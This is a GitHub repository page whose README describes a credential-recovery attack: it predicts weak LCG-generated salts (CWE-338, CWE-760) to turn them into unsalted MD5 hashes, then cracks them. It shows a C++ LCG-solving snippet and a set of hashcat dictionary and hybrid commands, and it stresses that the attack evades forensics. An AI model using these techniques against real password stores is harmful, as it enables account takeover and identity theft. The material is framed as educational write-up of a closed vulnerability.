Skip to content
/ cwe-shark-h Public

Attack on vulnerability in developed feature where cwe-338, cwe-760 can be exploited and unsalted hashes can be obtained to perform a recovery with several strategies.

License

MIT license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

alexandertoepfer/cwe-shark-h

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
LICENSE.md
LICENSE.md
 
 
README.md
README.md
 
 
SHARK-H.cpp
SHARK-H.cpp
 
 
aes128.hpp
aes128.hpp
 
 
data.js.aes
data.js.aes
 
 
generate.cpp
generate.cpp
 
 
md5.hpp
md5.hpp
 
 
sha256.hpp
sha256.hpp
 
 
utils.hpp
utils.hpp
 
 

Repository files navigation

Salt-Hash Approximation Recovery-attack with Known plaintext using data containers (Hashcat)

⚠️ Disclaimer: PLEASE BE AWARE THAT THE VULNERABILITY HAS BEEN IDENTIFIED AND SUCCESSFULLY CLOSED. NO KNOWN ATTACKS HAVE BEEN EXECUTED USING THIS VULNERABILITY AND NO DATA WAS OBTAINABLE BY THIRD PARTIES. THE INFORMATION PRESENTED IS FOR EDUCATIONAL PURPOSES ONLY AND DOES NOT REPRESENT AN ONGOING RISK.

This is a demonstrative recovery attack with which any low privilege user of the system can potentially steal user credentials and perform actions using a different identity, this works by exploiting the password reset feature shortly after a finished update cycle in combination with data containers for the attacker to map possible prng sequences to salts for hash predictions, the attack does not set off any data integrity measures, cyber forensics would only notice traces of the attack once the attacker is already using compromised credentials, making it hard if not impossible to identify the source.

Summary

  1. Remove nearby hash salts by iteration of lcg parameters with known points in sequence
  2. Fire and forget guessed unsalted hashes based on lcg sequence via cloud compute services
  3. Copyright

CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

Uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong. 

//for d=1
rlcg<a, c, m, /*second modulo*/0> rlcg({p1, p2});
if(!rlcg.solution().empty())
  std::cout << rlcg.solution() << std::endl;

CWE-760 Use of a One-Way Hash with a Predictable Salt

One-way cryptographic hash against an input that should not be reversible, such as a password, but uses a predictable salt as part of the input. 

hashcat.exe -m 0 ./md5_salt_guess.hash -a 0 -d 1 ./rockyou-extended.dict & hashcat.exe -m 0 ./md5_salt_guess.hash -a 6 -d 1 -1 "!$??" ./rockyou-extended.dict ?1 &^
hashcat.exe -m 0 ./md5_salt_guess.hash -a 6 -d 1 -1 "@#%&*" ./rockyou-extended.dict ?1 & hashcat.exe -m 0 ./md5_salt_guess.hash -a 6 -d 1 -1 "12347890" -2 "!$??" ./rockyou-extended.dict ?1?2 &^
hashcat.exe -m 0 ./md5_salt_guess.hash -a 6 -d 1 -1 "12347890" ./rockyou-extended.dict ?1 & more hashcat.potfile

Copyright and license

Code and documentation copyright 2021 Alexander Töpfer. Code released under the MIT License

About

Attack on vulnerability in developed feature where cwe-338, cwe-760 can be exploited and unsalted hashes can be obtained to perform a recovery with several strategies.

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages